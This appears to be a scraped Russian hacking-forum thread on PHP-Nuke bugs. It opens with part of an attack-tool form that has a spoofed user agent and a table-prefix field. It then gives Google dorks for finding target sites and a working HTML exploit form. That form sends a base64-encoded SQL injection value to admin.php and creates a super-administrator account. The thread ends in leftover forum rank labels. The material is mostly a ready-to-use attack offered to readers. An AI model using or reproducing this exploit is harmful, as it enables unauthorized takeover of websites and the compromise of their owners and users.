<input type="text" name="user_agent" value="<?=(isset($_POST['user_agent'])) ? $_POST['user_agent'] : 'Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)'; ?>" size="60">
</font></td>
</tr>
<tr>
<td bgcolor="E39930"><strong><font size="2" face="Arial, Helvetica, sans-serif">table prefix </font></strong></td>
<td bgcolor="#999999"><font face="Arial, Helvetica, sans-serif">
<input name="prefix" type="text" id="prefix" value="<?=(isset($_POST['prefix'])) ? $_POST['prefix'] : 'nuke'; ?>">
</font></td>
</tr>
<tr>
<td bgcolor="E39930"><strong><font size="2" face="Arial, Helvetica, sans-serif">method</font></strong></td>
<td bgcolor="#999999"><select name="method" size="1" id="method">
<option value="POST">POST</option>
<option value="GET">GET</option>
</select></td>
</tr>
<tr>
<td bgcolor="E39930"> </td>
<td bgcolor="#999999"> </td>
</tr>
</table>
<p>
<input type="submit" name="Submit" value="rock-n-roll">
</p>
</form>




<font size="2">(c) RST/GHC</font>

<hr size="3">
<?
# DEBUG

print $result;
?>

Добавлено в [time]1223997681[/time]
Create Admin in PHP-NUKE

Google Dork :
inurl:admin.php
inurl:v-web/portal/cms
inurl:v-web/portal/73/

EXPLOIT :

Код:

<form name="mantra" method="POST" action="http://www.xxx.com/admin.php"
<p>USERNAME: 
<input type="text" name="add_aid" value = "hackers">


NOME: 
<input type="text" name="add_name" value = "hackers">


PASSWORD: 
<input type="text" name="add_pwd" value = "hackers">


E-MAIL: 
<input type="text" name="add_email" value = [email="birxx@yahoo.com"]birxx@yahoo.com[/email]>


<input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox">


<input type="hidden" name="add_radminsuper" value="1">


<input type="hidden" name="op" value="AddAuthor">
</p>
<p>
<input type="submit" name="Submit" value="Create Admin">


</p>
</form>

Баги в PHP-Nuke

Старожил форума

CPU register

Старожил форума

Старожил форума

HDD-drive

CD-диск

(L2) cache

CPU register

(L2) cache

(L3) cache

CPU register

(L3) cache

(L2) cache

(L3) cache

(L2) cache

(L2) cache

(L2) cache

HDD-drive

HDD-drive

RAID-массив